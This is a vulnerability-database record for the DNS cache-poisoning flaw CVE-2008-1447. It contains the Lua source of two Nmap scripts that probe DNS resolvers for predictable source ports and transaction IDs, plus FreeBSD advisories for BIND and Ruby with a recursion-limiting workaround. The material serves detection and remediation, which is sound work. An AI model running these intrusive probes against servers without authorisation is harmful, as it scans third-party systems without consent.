https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\nporttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-srcport <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n-- This script uses (with permission) Duane Wessels' porttest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbeef\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: porttest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xbe, 0xef, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"porttest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. \"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xbe\n or string.byte(result, 2) ~= 0xef) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. \"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nThe official ruby site reports:\n\nresolv.rb allow remote attackers to spoof DNS answers. This risk\n\t can be reduced by randomness of DNS transaction IDs and source\n\t ports.\n\n", "edition": 4, "modified": "2009-02-09T00:00:00", "published": "2008-08-08T00:00:00", "id": "959D384D-6B59-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/959d384d-6b59-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DNS spoofing vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
